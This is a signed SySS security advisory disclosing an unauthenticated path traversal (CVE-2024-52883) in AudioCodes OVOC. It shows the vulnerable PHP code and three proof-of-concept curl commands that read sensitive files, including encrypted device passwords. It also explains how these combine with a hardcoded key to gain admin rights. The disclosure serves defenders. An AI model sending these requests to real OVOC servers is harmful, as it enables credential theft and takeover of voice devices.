-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-075
Product:                   One Voice Operations Center (OVOC)
Manufacturer:              AudioCodes Ltd.
Affected Version(s):       < 8.4.582
Tested Version(s):         8.2.3122
Vulnerability Type:        Path Traversal (CWE-35)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2024-08-30
Solution Date:             2024-10-20
Public Disclosure:         2025-02-07
CVE Reference:             CVE-2024-52883
Author of Advisory:        Moritz Abrell, SySS GmbH
                           Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

AudioCodes OVOC is used for central management and logging/monitoring of 
AudioCodes devices.
 
The manufacturer describes the product as follows (see [1]):

"AudioCodes One Voice Operations Center (OVOC) is a voice network 
management solution that combines management of voice network 
devices and quality of experience monitoring into a single, 
intuitive application. OVOC enables administrators to adopt a holistic 
approach to network lifecycle management by simplifying everyday tasks 
and assisting in troubleshooting all the way from detection to correction. 
OVOC can be deployed in service provider and enterprise networks and 
supports end-to-end quality of experience monitoring in Microsoft Teams 
environments.

OVOC provides IT staff with single pane of glass through which they can 
manage and monitor VoIP devices and elements from a single centralized 
location, saving time and costs. Tasks normally considered to be complex 
and time-consuming, such as performing root cause analysis, provisioning 
new devices and initiating bulk software updates, can now be carried out 
simply and rapidly. OVOC’s open APIs enable integration with 3rd party 
applications to provide additional functionality such as enhanced voice 
analytics and data-layer monitoring."

Due to a path traversal vulnerability, sensitive data can be read without 
any authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The PHP application at the web path "/ipp/admin/AudioCodes_files/ipp_params.php"
of OVOC can be accessed without any authentication and is vulnerable to a path 
traversal vulnerability.

Vulnerable code section:

#########################
$name = $_GET['name'];
$filename = empty($name) ? 'ipp_params.csv' : 'files/ac/'.$name.'.csv';
echo "<table>\n\n";
$f = fopen($filename, "r");
while (($line = fgetcsv($f)) !== false) {
        echo "<tr>";
        foreach ($line as $cell) {
                echo "<td>" . htmlspecialchars($cell) . "</td>";
        }
        echo "</tr>\n";
}
fclose($f);
echo "\n</table>";
#########################

This allows for path traversal for the GET parameter "name", therefore 
accessing any file with a ".csv " extension.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Example #1:
    Accessing the toplogy view:
    #> curl -v "https://<ovoc-address>/ipp/admin/AudioCodes_files/ipp_params.php?name=../../../../../../ACEMS/NBIF/topology/MGsTopologyList"

    Note: This file contains sensitive information such as encrypted 
        passwords of assigned devices, e.g. Session Border Controllers.
        In combination with the hardcoded key (see SYSS-2024-079[4]),
        an unauthenticated attacker is able to extract sensitive 
        information, decrypt them and gain administrative rights
        on assigned devices.


Example #2:
    Accessing a device's status:
    #> curl -v "https://<ovoc-address>/ipp/admin/AudioCodes_files/ipp_params.php?name=../../../../../../ACEMS/NBIF/ippmanager/tmp/ExportDevicesStatus"


Example #3: 
    Accessing the activity log:
    #> curl -v "https://<ovoc-address>/ipp/admin/AudioCodes_files/ipp_params.php?name=../../../../../../../var/log/ems/Activity/IPP_activity_log"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends updating to OVOC version 8.4.582.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-08-27: Vulnerability discovered
2024-08-30: Vulnerability reported to manufacturer
2024-09-02: Asked manufacturer for reception
2024-09-02: Manufacturer confirms reception
2024-09-18: Requested a status update from the manufacturer
2024-09-19: Manufacturer responded with the investigation state of other 
            reported vulnerabilities; SYSS-2024-075 is not mentioned
2024-09-24: Asked manufacturer about the state of SYSS-2024-075
2024-09-24: Manufacturer responded that SYSS-2024-075 is forwarded to the
            development team
2024-10-02: Manufacturer mentioned that a fix is planned for the next 
            software release
2024-10-29: Manufacturer informed that a fix is released on October 20, 2024;
            fixed version: 8.4.582
2024-10-29: Recognized that the vulnerability is not mentioned in the
            release notes[5]; asked the manufacturer about the state
2024-10-29: Manufacturer mentioned that the vulnerability is marked as
            "internal" and not referenced publicly
2024-11-18: Informed manufacturer about the assigend CVE-ID: CVE-2024-52883
2025-01-31: Asked the manufacturer again for references in the release notes
2025-02-07: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes OVOC product website
    https://www.audiocodes.com/solutions-products/products/management-products-solutions/one-voice-operations-center
[2] SySS Security Advisory SYSS-2024-075
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-075.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] SySS Security Advisory SYSS-2024-079
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-079.txt
[5] OVOC release notes
    https://www.audiocodes.com/media/bnabwtog/audiocodes-one-voice-operations-center-release-notes-ver-84.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell and Nicola Staller of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmekd5kACgkQrgyb+PE0
i1PcbxAApqvt7ToLqqeQo5Yj/dZajFs4pbCBVGGlOtJtRB93QlIa2Ia9JaSBiJ7M
w5nBnsTfNn7048yyYeE6kQhTJ2xSA0DBq3Cu/hyE8ZAGd9xw6ntrGT22ee72gPz/
fW+8aPXsgbzWK+E43X/aGgNlPWKnO+4UrIggR3vSWhvkztSJXnPTIOFCgpFnpnGB
QhillrI9RIxzhYYZV0XBJu/2ihr5xJbwx1xJy2t9GWUriX0Eou+AdT7hefGioxBs
ohH3rg70BrJ34eOb0LANSVqEWg75XPc7+p1WoJEMbc3I2UoL2fMm/upC4keXtN31
5FcvMiZdnLX4m9vGKkFyUDQ1CSl+fep7H4OTSbpc626UiN+gzIOKwcGVdPkdJYVb
7z1AMaY8ZQEaHNOjKyOsgeE5ChWsoHKRVGYLJoJXmvUHb6OH3WJ/qYqygv1F8Cco
bRQEZF0ez1lu/IfsjQuF6N2Px0H+G4jUM07RGKIrUz4/pR4rQQS+ifhqISCF/H1f
DdXjp14Gnd0DaD/Fz0bAsjo8d9FW4tGWQBoqz+zAkX4u7HkMUrmCRyAsuB1aUZ1g
R0KbPzZc+Q5OwgIO2uBI4Su1v3p7O39PUS+Mr0yxRHfRHvzguWcc395A9N+wTSGf
5piHE292k+E/+IxYj7dLgYcvxRR5sVhEf+tdOfeY82UktqISOpw=
=+Oxm
-----END PGP SIGNATURE-----